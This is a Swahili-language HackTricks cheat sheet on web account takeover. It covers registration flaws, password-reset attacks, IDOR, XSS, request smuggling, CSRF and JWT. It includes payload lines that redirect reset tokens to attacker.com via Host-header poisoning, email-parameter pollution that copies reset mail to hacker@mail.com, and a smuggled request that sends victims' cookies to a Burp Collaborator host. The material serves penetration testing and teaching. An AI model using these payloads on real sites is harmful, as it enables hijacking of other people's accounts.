# Mafunzo ya kuhack AWS kutoka sifuri hadi bingwa na [htARTE (HackTricks AWS Red Team Expert)](https://training.hacktricks.xyz/courses/arte)!

Njia nyingine za kusaidia HackTricks:

- Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
- Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
- Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
- **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

## Uchukuzi wa Usajili

### Usajili wa Nakala

- Jaribu kuzalisha kwa kutumia jina la mtumiaji lililopo
- Angalia kubadilisha barua pepe:
  - herufi kubwa
  - \+1@
  - ongeza alama ya nukta kwenye barua pepe
  - herufi maalum kwenye jina la barua pepe (%00, %09, %20)
  - Weka herufi nyeusi baada ya barua pepe: `test@test.com a`
  - victim@gmail.com@attacker.com
  - victim@attacker.com@gmail.com

### Uchunguzi wa Jina la Mtumiaji

Angalia ikiwa unaweza kugundua wakati jina la mtumiaji tayari limeandikishwa ndani ya programu.

### Sera ya Nenosiri

Unapounda mtumiaji, angalia sera ya nenosiri (angalia ikiwa unaweza kutumia nywila dhaifu).\
Katika kesi hiyo, unaweza kujaribu kuvunja nywila.

### SQL Injection

[**Angalia ukurasa huu**](sql-injection/#insert-statement) ili kujifunza jinsi ya kujaribu kuchukua akaunti au kutoa habari kupitia **SQL Injections** kwenye fomu za usajili.

### Uchukuzi wa Oauth

{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
{% endcontent-ref %}

### Mabomu ya SAML

{% content-ref url="saml-attacks/" %}
[saml-attacks](saml-attacks/)
{% endcontent-ref %}

### Badilisha Barua pepe

Baada ya kusajiliwa, jaribu kubadilisha barua pepe na angalia ikiwa mabadiliko haya yanathibitishwa kwa usahihi au yanaweza kubadilishwa kuwa barua pepe za kiholela.

### Uchunguzi Zaidi

- Angalia ikiwa unaweza kutumia **barua pepe za kutumia na kutupa**
- **Nenosiri ndefu** (>200) husababisha **DoS**
- **Angalia mipaka ya kiwango cha uundaji wa akaunti**
- Tumia username@**burp\_collab**.net na uchambue **callback**

## **Uchukuzi wa Kurejesha Nenosiri**

### Kuvuja kwa Kitufe cha Kurejesha Nenosiri Kupitia Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Omba kurejesha nenosiri kwa anwani yako ya barua pepe
2. Bonyeza kiunga cha kurejesha nenosiri
3. Usibadilishe nenosiri
4. Bonyeza tovuti za 3rd party (k.m. Facebook, twitter)
5. Ingilia ombi kwenye kichupo cha Burp Suite proxy
6. Angalia ikiwa kichwa cha kurejelea kinavuja kitufe cha kurejesha nenosiri.

### Kuharibu Kurejesha Nenosiri <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Ingilia ombi la kurejesha nenosiri kwenye Burp Suite
2. Ongeza au hariri vichwa vifuatavyo kwenye Burp Suite: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Wasilisha ombi na kichwa kilichobadilishwa\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Tafuta URL ya kurejesha nenosiri kulingana na kichwa cha _host_ kama vile: `https://attacker.com/reset-password.php?token=TOKEN`

### Kurejesha Nenosiri Kupitia Parameta ya Barua pepe <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
### IDOR kwenye Vigezo vya API <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>

1. Mshambuliaji anapaswa kuingia kwenye akaunti yake na kwenda kwenye kipengele cha **Badilisha nenosiri**.
2. Anza Burp Suite na Kukamata ombi.
3. Tuma ombi kwenye kichupo cha kurudia na hariri vigezo: Kitambulisho cha Mtumiaji/barua pepe\
`powershell POST /api/changepass [...] ("fomu": {"barua pepe":"victim@email.com","nenosiri":"securepwd"})`

### Kitufe dhaifu cha Rudisha Nenosiri <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>

Kitufe cha rudisha nenosiri kinapaswa kuundwa kwa nasibu na kuwa tofauti kila wakati.\
Jaribu kubaini ikiwa kitufe hicho kinakwisha au ikiwa ni sawa kila wakati, katika baadhi ya kesi algorithm ya uundaji ni dhaifu na inaweza kubashiriwa. Hizi ni baadhi ya pembejeo zinazoweza kutumiwa na algorithm.

* Muda
* Kitambulisho cha Mtumiaji
* Barua pepe ya Mtumiaji
* Jina la Kwanza na Jina la Mwisho
* Tarehe ya Kuzaliwa
* Kriptografia
* Nambari pekee
* Mfuatano mdogo wa kitufe (herufi kati ya \[A-Z,a-z,0-9])
* Matumizi ya kitufe mara nyingi
* Tarehe ya kumalizika ya kitufe

### Kuvuja kwa Kitufe cha Rudisha Nenosiri <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>

1. Chokoza ombi la kurejesha nenosiri kwa kutumia API/UI kwa barua pepe maalum kama vile: test@mail.com
2. Angalia majibu ya seva na tafuta `resetToken`
3. Kisha tumia kitufe hicho kwenye URL kama vile `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`

### Rudisha Nenosiri Kupitia Kugongana kwa Jina la Mtumiaji <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>

1. Jisajili kwenye mfumo na jina la mtumiaji sawa na jina la mtumiaji wa muathirika, lakini na nafasi nyeupe zilizoingizwa kabla na/au baada ya jina la mtumiaji. Kwa mfano: `"admin "`
2. Omba kurejesha nenosiri na jina lako la mtumiaji mbaya.
3. Tumia kitufe kilichotumwa kwenye barua pepe yako na rudisha nenosiri la muathirika.
4. Ingia kwenye akaunti ya muathirika kwa kutumia nenosiri jipya.

Jukwaa la CTFd lilikuwa na udhaifu kwa shambulio hili.\
Angalia: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)

### Kuchukua Udhibiti wa Akaunti Kupitia Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>

1. Tafuta XSS ndani ya programu au kikoa cha chini ikiwa vidakuzi vimehifadhiwa kwenye kikoa cha mzazi: `*.domain.com`
2. Vuja kuki ya kikao cha sasa
3. Thibitisha kama mtumiaji kwa kutumia kuki

### Kuchukua Udhibiti wa Akaunti Kupitia HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>

1\. Tumia **smuggler** kugundua aina ya HTTP Request Smuggling (CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. Unda ombi ambalo litafuta `POST / HTTP/1.1` na data ifuatayo:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` na lengo la kuhamisha upya wa wazi wa waathirika kwa burpcollab na kuiba vidakuzi vyao\
3\. Ombi la mwisho linaweza kuonekana kama ifuatavyo
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X
```
Ripoti za Hackerone zinaonyesha kuwa kuna udhaifu huu\
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)

### Kuchukua Udhibiti wa Akaunti kupitia CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>

1. Unda mzigo wa CSRF, kwa mfano: "Fomu ya HTML na uthibitisho wa moja kwa moja kwa mabadiliko ya nenosiri"
2. Tuma mzigo huo

### Kuchukua Udhibiti wa Akaunti kupitia JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>

Kitambulisho cha JSON Web Token kinaweza kutumika kuthibitisha mtumiaji.

* Hariri JWT na Kitambulisho cha Mtumiaji / Barua pepe nyingine
* Angalia saini dhaifu ya JWT

{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
{% endcontent-ref %}

## Marejeo

* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>